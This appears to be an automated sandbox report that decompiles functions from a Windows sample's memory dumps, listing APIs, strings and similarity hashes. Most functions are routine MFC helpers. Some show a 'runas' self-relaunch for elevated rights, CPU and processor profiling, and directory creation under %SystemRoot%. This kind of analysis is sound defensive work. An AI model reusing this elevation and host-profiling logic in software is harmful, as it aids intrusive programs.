__EH_prolog3_GS.LIBCMT ref: 00418721
GetModuleHandleA.KERNEL32(?,00441E94,00000000,?), ref: 004187EC
GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 004187FC

Strings

mfcm80.dll, xrefs: 004187DB
MFCM80ReleaseManagedReferences, xrefs: 004187F6

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressH_prolog3_HandleModuleProc
String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
API String ID: 2418878492-2500072749
Opcode ID: 2ca0111e0dc1d03df5c60480a6984240f6dcc38644d6eaed1fc8fd56c491cae3
Instruction ID: 6087722dc38ad4aacf6c46ce711b78dce545afc184d9c30f9304097a231e4adc
Opcode Fuzzy Hash: 2ca0111e0dc1d03df5c60480a6984240f6dcc38644d6eaed1fc8fd56c491cae3
Instruction Fuzzy Hash: 4B316070A00214CBCF15EFA5D881BEE77A5AF18304F6440AEE811AB292DF7CDD45CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00418E77, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
comCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00418E77(signed int __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t49;
				signed int _t60;
				signed int _t64;
				signed int _t67;
				signed int _t80;
				signed int _t86;
				intOrPtr* _t90;
				void* _t91;

				_t74 = __ebx;
				_push(0x80);
				E00427243(E0043A984, __ebx, __edi, __esi);
				_t49 =  *((intOrPtr*)(_t91 + 8));
				_t90 = __ecx;
				 *((intOrPtr*)(_t91 - 0x50)) = 0;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x43dea4;
				 *(_t91 - 4) = 0;
				if(_t49 == 0 ||  *(_t49 + 4) == 0) {
					if(E004182D7(_t91 - 0x54, 0x11) != 0 || E004182D7(_t91 - 0x54, 0xd) != 0) {
						_t49 = _t91 - 0x54;
						goto L6;
					} else {
						 *((intOrPtr*)(_t90 + 0x64)) = 0;
					}
				} else {
					L6:
					_t11 = _t49 + 4; // 0x41c609
					GetObjectA( *_t11, 0x3c, _t91 - 0x4c);
					_push(_t91 - 0x30);
					 *(_t91 - 0x78) = 0x20;
					E00415700(_t74, _t91 - 0x58, 0, _t90, __eflags);
					 *((intOrPtr*)(_t91 - 0x74)) =  *((intOrPtr*)(_t91 - 0x58));
					 *((short*)(_t91 - 0x68)) =  *((intOrPtr*)(_t91 - 0x3c));
					 *(_t91 - 0x66) =  *(_t91 - 0x35) & 0x000000ff;
					 *(_t91 - 0x64) =  *(_t91 - 0x38) & 0x000000ff;
					 *(_t91 - 0x60) =  *(_t91 - 0x37) & 0x000000ff;
					 *(_t91 - 0x5c) =  *(_t91 - 0x36) & 0x000000ff;
					_t60 =  *(_t91 - 0x4c);
					__eflags = _t60;
					 *(_t91 - 4) = 1;
					_t74 = _t60;
					if(__eflags < 0) {
						_t74 =  ~_t60;
					}
					E00414208(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					 *(_t91 - 4) = 2;
					_t80 = GetDeviceCaps( *(_t91 - 0x84), 0x5a);
					_t64 = _t74 * 0xafc80;
					asm("cdq");
					_t86 = _t64 % _t80;
					_t90 = _t90 + 0x64;
					 *((intOrPtr*)(_t91 - 0x6c)) = 0;
					 *(_t91 - 0x70) = _t64 / _t80;
					E00421C36(_t90);
					_t67 = _t91 - 0x78;
					__imp__#420(_t67, 0x441ee4, _t90,  *((intOrPtr*)(_t90 + 0x20)));
					__eflags = _t67;
					if(__eflags < 0) {
						 *_t90 = 0;
					}
					 *(_t91 - 4) = 1;
					E0041425C(_t74, _t91 - 0x8c, 0, _t90, __eflags);
					__eflags =  *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0;
					E00401E60( *((intOrPtr*)(_t91 - 0x58)) + 0xfffffff0, _t86);
				}
				 *(_t91 - 4) =  *(_t91 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t91 - 0x54)) = 0x43de94;
				E00414400(_t91 - 0x54);
				return E004272C6(_t74, 0, _t90);
			}

APIs

__EH_prolog3_GS.LIBCMT ref: 00418E81
GetObjectA.GDI32(0041C609,0000003C,?), ref: 00418ED3
GetDeviceCaps.GDI32(?,0000005A), ref: 00418F43
OleCreateFontIndirect.OLEAUT32(00000020,00441EE4), ref: 00418F6F

Strings

, xrefs: 00418EE0

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
String ID:
API String ID: 2429671754-3916222277
Opcode ID: f8a67d8bb4d6e6d7d38fda3f9cad975486aaec7c9b8741b20dfeebb5b57bc75d
Instruction ID: 232da4873634afa8946e6f52076fc517d976209c00a11014a9b5625df8a67a91
Opcode Fuzzy Hash: f8a67d8bb4d6e6d7d38fda3f9cad975486aaec7c9b8741b20dfeebb5b57bc75d
Instruction Fuzzy Hash: B8419C34E012489EDB10DFE5D901ADDFFF4AF28304F10815EE455EB291EB788A84CB18

Uniqueness

Uniqueness Score: -1.00%

Function 0040CF27, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E0040CF27(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a116, void* _a120) {
				void _v12;
				char _v16;
				intOrPtr _v20;
				int _v24;
				char _v124;
				char _v172;
				signed int _t25;
				unsigned int _t27;
				unsigned int _t31;
				int _t36;
				signed int* _t43;
				struct HBITMAP__* _t45;
				int _t48;
				void* _t49;
				unsigned int _t50;
				signed int _t53;
				void* _t56;
				signed char* _t57;
				signed int _t62;
				void* _t63;
				signed int _t66;
				signed short _t68;
				void* _t70;
				signed int _t72;

				_t56 = __edx;
				_t72 =  &_v124;
				_t25 =  *0x44f5d0; // 0x8e7de579
				_a116 = _t25 ^ _t72;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t27 = GetMenuCheckMarkDimensions();
				_t48 = _t27;
				_t50 = _t27 >> 0x10;
				_v24 = _t50;
				if(_t48 <= 4 || _t50 <= 5) {
					_push(_t72);
					_push(_t50);
					_t22 =  &_v172; // 0x44e938
					_v172 = 0x44e9d0;
					E00429326(_t22, 0x448990);
					asm("int3");
					_t31 = _t50;
					 *(_t31 + 4) = 1;
					return _t31;
				} else {
					if(_t48 > 0x20) {
						_t48 = 0x20;
					}
					asm("cdq");
					_t66 = _t48 + 0xf >> 4;
					_t62 = (_t48 - 4 - _t56 >> 1) + (_t66 << 4) - _t48;
					if(_t62 > 0xc) {
						_t62 = 0xc;
					}
					_t36 = 0x20;
					if(_t50 > _t36) {
						_v24 = _t36;
					}
					E004277B0(_t62,  &_v12, 0xff, 0x80);
					_t43 = _t72 + (_v24 + 0xfffffffa >> 1) * _t66 * 2 - 0xc;
					_t57 = 0x43dd04;
					_v20 = _t66 + _t66;
					_v16 = 5;
					do {
						_t68 = ( *_t57 & 0x000000ff) << _t62;
						_t57 =  &(_t57[1]);
						_t53 =  !_t68 & 0x0000ffff;
						 *_t43 = _t53;
						_t43[0] = _t53;
						_t43 = _t43 + _v20;
						_t17 =  &_v16;
						 *_t17 = _v16 - 1;
					} while ( *_t17 != 0);
					_t45 = CreateBitmap(_t48, _v24, 1, 1,  &_v12);
					_pop(_t63);
					_pop(_t70);
					 *0x452830 = _t45;
					_pop(_t49);
					if(_t45 == 0) {
						 *0x452830 = _t45;
					}
					return E0042569C(_t45, _t49, _a116 ^ _t72, _t57, _t63, _t70);
				}
			}

APIs

GetMenuCheckMarkDimensions.USER32 ref: 0040CF3F
_memset.LIBCMT ref: 0040CFA1
CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 0040CFF3
LoadBitmapA.USER32 ref: 0040D00B

Strings

, xrefs: 0040CF60

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
String ID:
API String ID: 4271682439-3916222277
Opcode ID: 1d5cad00afa336aaffbddcf4cdf22d6ed8b71d44c22b828f749b8a4dcf832728
Instruction ID: ff8a9b82f149e6bb8e36447a507e87552ebd01f97dd91890b82622f02b1772e5
Opcode Fuzzy Hash: 1d5cad00afa336aaffbddcf4cdf22d6ed8b71d44c22b828f749b8a4dcf832728
Instruction Fuzzy Hash: C331D472A0020A9BEF20DF78EDC5ABE7BA6EB44704F14063BE901EB2C1D634D904C755

Uniqueness

Uniqueness Score: -1.00%

Function 0040C1D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C1D0(void* __ebx, void* __ecx, void* __edx, void* __eflags, struct HWND__** _a4) {
				void* __edi;
				struct HWND__* _t10;
				struct HWND__* _t12;
				struct HWND__* _t14;
				struct HWND__* _t15;
				int _t19;
				void* _t21;
				void* _t25;
				struct HWND__** _t26;
				void* _t27;

				_t25 = __edx;
				_t21 = __ebx;
				_t26 = _a4;
				_t27 = __ecx;
				if(E0040F2C9(__ecx, __eflags, _t26) == 0) {
					_t10 = E0041172F(__ecx);
					__eflags = _t10;
					if(_t10 == 0) {
						L5:
						__eflags = _t26[1] - 0x100;
						if(_t26[1] != 0x100) {
							L13:
							return E0040F708(_t26);
						}
						_t12 = _t26[2];
						__eflags = _t12 - 0x1b;
						if(_t12 == 0x1b) {
							L8:
							__eflags = GetWindowLongA( *_t26, 0xfffffff0) & 0x00000004;
							if(__eflags == 0) {
								goto L13;
							}
							_t14 = E00416BE8(_t21, _t25, _t26, __eflags,  *_t26, "Edit");
							__eflags = _t14;
							if(_t14 == 0) {
								goto L13;
							}
							_t15 = GetDlgItem( *(_t27 + 0x20), 2);
							__eflags = _t15;
							if(_t15 == 0) {
								L12:
								SendMessageA( *(_t27 + 0x20), 0x111, 2, 0);
								goto L1;
							}
							_t19 = IsWindowEnabled(_t15);
							__eflags = _t19;
							if(_t19 == 0) {
								goto L13;
							}
							goto L12;
						}
						__eflags = _t12 - 3;
						if(_t12 != 3) {
							goto L13;
						}
						goto L8;
					}
					__eflags =  *(_t10 + 0x68);
					if( *(_t10 + 0x68) == 0) {
						goto L5;
					}
					return 0;
				}
				L1:
				return 1;
			}

Strings

Edit, xrefs: 0040C220

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: Edit
API String ID: 0-554135844
Opcode ID: 6921a44342a32149d4a1c54dab2e1f699f62b3ccf61b0d2c03c7ef3c85b7d0c1
Instruction ID: 0fcbe3f62aec2f0407e477c9a08b7d44b01765e15394a0ef006839ba9e6c30f7
Opcode Fuzzy Hash: 6921a44342a32149d4a1c54dab2e1f699f62b3ccf61b0d2c03c7ef3c85b7d0c1
Instruction Fuzzy Hash: 3D01CE30A00201E6EA3027759C88B67B7A9AF51710F11067FF942F56E1CB7DE842E5AC

Uniqueness

Uniqueness Score: -1.00%

Function 1000593E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E1000593E(void* __eflags) {
				struct _SHELLEXECUTEINFOA _v64;
				void _v323;
				char _v324;
				void _v583;
				char _v584;
				signed int _t36;
				signed int _t38;
				signed int _t42;

				_v324 = _v324 & 0x00000000;
				_t36 = 0x40;
				memset( &_v323, 0, _t36 << 2);
				asm("stosw");
				asm("stosb");
				GetModuleFileNameA(0,  &_v324, 0x104);
				if(E1000590A() != 0) {
					_v584 = _v584 & 0x00000000;
					_t38 = 0x40;
					memset( &_v583, 0, _t38 << 2);
					asm("stosw");
					asm("stosb");
					strcat( &_v584,  &_v324);
					_v64.cbSize = 0x3c;
					_t42 = 0xe;
					memset( &(_v64.fMask), 0, _t42 << 2);
					_v64.lpVerb = "runas";
					_v64.lpFile =  &_v584;
					_v64.nShow = 5;
					if(ShellExecuteExA( &_v64) != 0) {
						ExitProcess(0);
					}
				}
				return 0;
			}

0x10005947
0x10005953
0x1000595a
0x1000595c
0x1000595e
0x1000596d
0x1000597a
0x1000597c
0x10005985
0x1000598e
0x10005990
0x10005992
0x100059a1
0x100059af
0x100059b6
0x100059b7
0x100059bf
0x100059c6
0x100059cd
0x100059dc
0x100059e0
0x100059e0
0x100059dc
0x100059ea

APIs

GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1000596D

Part of subcall function 1000590A: GetVersionExA.KERNEL32(?), ref: 10005924

strcat.MSVCRT(00000000,00000000), ref: 100059A1
ShellExecuteExA.SHELL32(0000003C), ref: 100059D4
ExitProcess.KERNEL32 ref: 100059E0

Strings

<, xrefs: 100059AF

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ExecuteExitFileModuleNameProcessShellVersionstrcat
String ID: <
API String ID: 1686582770-4251816714
Opcode ID: 9e7dbc8843d25062ddb523f1f0769827ac02243dc61f007c3a1a25eef68d96da
Instruction ID: 8c58578cc260f4ad235a2893211c0340f9a20037a17f5774d3063c5a471523e9
Opcode Fuzzy Hash: 9e7dbc8843d25062ddb523f1f0769827ac02243dc61f007c3a1a25eef68d96da
Instruction Fuzzy Hash: 6811307390425CAAEB61DBA4DC49BCEB7B8FB48345F1004A6E309B61D0DBB49648CF55

Uniqueness

Uniqueness Score: -1.00%

Function 10002AEF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
stringCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E10002AEF(char* _a4) {
				void _v263;
				char _v264;
				int _t12;
				CHAR* _t15;
				signed int _t18;
				char* _t24;
				int _t25;
				void* _t26;
				void* _t27;

				_v264 = _v264 & 0x00000000;
				_t18 = 0x40;
				_t25 = 0;
				memset( &_v263, 0, _t18 << 2);
				_t27 = _t26 + 0xc;
				asm("stosw");
				asm("stosb");
				_t24 = _a4;
				_t12 = strlen(_t24);
				if(_t12 <= 0) {
					L5:
					return _t12;
				} else {
					goto L1;
				}
				do {
					L1:
					if( *((char*)(_t25 + _t24)) == 0x5c) {
						E1000CC3E( &_v264, _t24, _t25);
						_t15 =  &_v264;
						__imp___access(_t15, 0);
						_t27 = _t27 + 0x14;
						if(_t15 == 0xffffffff) {
							CreateDirectoryA( &_v264, 0);
						}
					}
					_t25 = _t25 + 1;
					_t12 = strlen(_t24);
				} while (_t25 < _t12);
				goto L5;
			}

0x10002af8
0x10002b03
0x10002b0c
0x10002b0e
0x10002b0e
0x10002b10
0x10002b12
0x10002b13
0x10002b17
0x10002b20
0x10002b6c
0x10002b6c
0x00000000
0x00000000
0x00000000
0x10002b22
0x10002b22
0x10002b26
0x10002b31
0x10002b36
0x10002b3f
0x10002b45
0x10002b4b
0x10002b56
0x10002b56
0x10002b4b
0x10002b5d
0x10002b5e
0x10002b66
0x00000000

APIs

strlen.MSVCRT ref: 10002B17
_access.MSVCRT ref: 10002B3F
CreateDirectoryA.KERNEL32(?,00000000), ref: 10002B56
strlen.MSVCRT ref: 10002B5E

Strings

%SystemRoot%\, xrefs: 10002AFF

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: strlen$CreateDirectory_access
String ID: %SystemRoot%\
API String ID: 2692904705-1296291543
Opcode ID: c5f5bf3460e74a2e088020478b26bd46e14b490396f6b5b5e09f24ff8e03f073
Instruction ID: d5906692216e9628af9234bb8eb3dc22b70ccd7c1e629355f0bdcb87671920da
Opcode Fuzzy Hash: c5f5bf3460e74a2e088020478b26bd46e14b490396f6b5b5e09f24ff8e03f073
Instruction Fuzzy Hash: 12012BB290076467FB30DB74DC88FCB7BACDB44361F100199E745E6080D7B0A6858A94

Uniqueness

Uniqueness Score: -1.00%

Function 00411F5B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00411F5B(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* __esi;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t28;

				_t28 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E004209A7(__ebp, 0xc);
				_push(E00411402);
				_t26 = E00416E02(__ebx, 0x452658, __edi, _t25, _t28);
				if(_t26 == 0) {
					E00415838(0x452658);
				}
				_t30 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E00420A14(0xc);
					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
				} else {
					_push("hhctrl.ocx");
					_t16 = E0040FA4C(_t21, _t24, _t26, _t30);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						__eflags = _t17;
						 *(_t26 + 8) = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

APIs

Part of subcall function 004209A7: EnterCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004209E3
Part of subcall function 004209A7: InitializeCriticalSection.KERNEL32(8E7DE579,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004209F2
Part of subcall function 004209A7: LeaveCriticalSection.KERNEL32(004529D8,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 004209FF
Part of subcall function 004209A7: EnterCriticalSection.KERNEL32(8E7DE579,?,?,?,?,00416E1D,00000010,00000008,0040E6AD,0040E650,0040D295,0040BAA3,?,00401099,00000000,8E7DE579), ref: 00420A0B

Part of subcall function 00416E02: __EH_prolog3_catch.LIBCMT ref: 00416E09

Part of subcall function 00415838: __CxxThrowException@8.LIBCMT ref: 0041584C

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 00411F9F
FreeLibrary.KERNEL32(?), ref: 00411FAF

Strings

HtmlHelpA, xrefs: 00411F99
X&E, xrefs: 00411F68
hhctrl.ocx, xrefs: 00411F83

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$X&E$hhctrl.ocx
API String ID: 3274081130-2799760243
Opcode ID: 9931ed1567fb8e466eb4ac25affe73acbefa34ca0a2b8cffc0c23a918aacd61a
Instruction ID: bc1770ff51e577bcc3fbb050918fbab37f6289e5dab745d7ba0f8e963837a8ed
Opcode Fuzzy Hash: 9931ed1567fb8e466eb4ac25affe73acbefa34ca0a2b8cffc0c23a918aacd61a
Instruction Fuzzy Hash: E901FE31105302DFDB206F61ED0AF9776E0AF14715F00882FF186914B1D738C891862E

Uniqueness

Uniqueness Score: -1.00%

Function 10008EEE, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E10008EEE(CHAR* _a4) {
				void* _v15;
				char _v16;
				struct _SYSTEM_INFO _v52;

				_v16 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosb");
				E1000D28E(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", "~MHz", 4,  &_v16, 0, 4, 0);
				GetSystemInfo( &_v52);
				return wsprintfA(_a4, "%d*%sMHz", _v52.dwNumberOfProcessors,  &_v16);
			}

0x10008efc
0x10008f00
0x10008f01
0x10008f02
0x10008f1b
0x10008f27
0x10008f47

APIs

Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2C3
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2D7
Part of subcall function 1000D28E: memset.MSVCRT ref: 1000D2E6
Part of subcall function 1000D28E: LoadLibraryA.KERNEL32(ADVAPI32.dll), ref: 1000D2F4
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000D30C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000D31C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000D32C
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000D339
Part of subcall function 1000D28E: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000D346
Part of subcall function 1000D28E: FreeLibrary.KERNEL32(?), ref: 1000D4D2

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000010), ref: 10008F27
wsprintfA.USER32 ref: 10008F3C

Strings

HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 10008F11
%d*%sMHz, xrefs: 10008F34
~MHz, xrefs: 10008F0C

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: AddressProc$memset$Library$FreeInfoLoadSystemwsprintf
String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
API String ID: 86330591-2169120903
Opcode ID: 275852c81d8d8df93d550e127c972733d72369b73ce7daf0eb38c8a790045f62
Instruction ID: 7eed8fa6c12a1334711ac70dff0229b0f64941030fdfa0d470fe944a0678d567
Opcode Fuzzy Hash: 275852c81d8d8df93d550e127c972733d72369b73ce7daf0eb38c8a790045f62
Instruction Fuzzy Hash: 96F08275D10108BBFB04EBE8DC06DEEB77CEB04204F404055FF21E2061EB70A6158B65

Uniqueness

Uniqueness Score: -1.00%

Function 004115CB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E004115CB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t15;
				intOrPtr* _t23;
				void* _t25;
				intOrPtr _t28;
				void* _t29;

				_push(4);
				E004271DA(E0043A190, __ebx, __edi, __esi);
				_t28 = __ecx;
				 *((intOrPtr*)(_t29 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x43e26c;
				 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
				if( *((intOrPtr*)(__ecx + 0x20)) != 0 && __ecx != 0x4524f8 && __ecx != 0x452550 && __ecx != 0x4525a8 && __ecx != 0x452600) {
					E00411081(__ebx, __ecx, _t25, __edi, __ecx);
				}
				_t23 =  *((intOrPtr*)(_t28 + 0x4c));
				if(_t23 != 0) {
					 *((intOrPtr*)( *_t23 + 4))(1);
				}
				_t15 =  *((intOrPtr*)(_t28 + 0x50));
				if(_t15 != 0 &&  *(_t15 + 0x28) == _t28) {
					 *(_t15 + 0x28) =  *(_t15 + 0x28) & 0x00000000;
				}
				 *(_t29 - 4) =  *(_t29 - 4) | 0xffffffff;
				return E004272B2(E0040CD77(_t28));
			}

APIs

__EH_prolog3.LIBCMT ref: 004115D2

Strings

lC, xrefs: 004115FC
lC, xrefs: 004115EC
lC, xrefs: 00411604
P%E, xrefs: 004115F4

Memory Dump Source

Source File: 00000001.00000002.463687697.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.463677405.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463814440.000000000043D000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463852955.000000000044E000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.463866171.000000000044F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463880501.0000000000452000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.463893307.0000000000455000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.463962268.0000000000489000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID: P%E$lC$lC$lC
API String ID: 431132790-3095559173
Opcode ID: 95f65ef72e2657b1868895f137b0d29f262bcf1023fba1ba3324b38e5cdf0e99
Instruction ID: aa42cf33f234935dbb20f1adc16bd2de27ac9fd01f81d223179ade2d48ce1ce4
Opcode Fuzzy Hash: 95f65ef72e2657b1868895f137b0d29f262bcf1023fba1ba3324b38e5cdf0e99
Instruction Fuzzy Hash: 78F0A970E00614CBCB34AB2985497AE72A06F44315F09416FD695573F1D7BD8CD4CA5E

Uniqueness

Uniqueness Score: -1.00%

Function 1000554E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E1000554E() {
				struct _devicemodeA _v160;

				GetSystemMetrics(0);
				GetSystemMetrics(1);
				_v160.dmBitsPerPel = 0x20;
				_v160.dmPelsWidth = 0x640;
				_v160.dmPelsHeight = 0x384;
				_v160.dmSize = 0x9c;
				_v160.dmFields = 0x1c0000;
				if(ChangeDisplaySettingsA( &_v160, 0) != 0) {
					_push(0);
					_push(0);
				} else {
					_push(1);
					_push( &_v160);
				}
				ChangeDisplaySettingsA();
				return 0;
			}

0x10005560
0x10005564
0x10005575
0x1000557c
0x10005583
0x1000558a
0x10005590
0x1000559b
0x100055a8
0x100055aa
0x1000559d
0x100055a3
0x100055a5
0x100055a5
0x100055ac
0x100055b2

APIs

GetSystemMetrics.USER32 ref: 10005560
GetSystemMetrics.USER32 ref: 10005564
ChangeDisplaySettingsA.USER32(?,00000000), ref: 10005597
ChangeDisplaySettingsA.USER32(00000000,00000000), ref: 100055AC

Strings

, xrefs: 10005575

Memory Dump Source

Source File: 00000001.00000002.465761791.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.465752166.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.465804093.000000001001B000.00000002.00000001.sdmp Download File
Associated: 00000001.00000002.465830628.0000000010023000.00000004.00000001.sdmp Download File

Similarity

API ID: ChangeDisplayMetricsSettingsSystem
String ID:
